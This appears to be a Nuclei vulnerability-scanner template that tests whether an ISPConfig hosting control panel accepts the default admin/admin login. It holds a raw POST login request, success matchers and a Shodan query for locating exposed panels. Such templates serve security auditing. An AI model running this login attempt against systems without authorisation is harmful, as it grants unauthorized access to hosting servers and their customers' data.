id: ispconfig-hcp-default-login

info:
  name: ISPConfig Hosting Control Panel - Default Login
  author: ritikchaddha
  severity: high
  description: |
    ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
  metadata:
    shodan-query: title:"ISPConfig" http.favicon.hash:483383992
    verified: true
    max-request: 1
  tags: ispconfig,hsp,default-login

http:
  - raw:
      - |
        POST /content.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&passwort={{password}}&s_mod=login&s_pg=index

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'LOGIN_REDIRECT:dashboard/dashboard.php'

      - type: word
        part: header
        words:
          - 'Set-Cookie'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950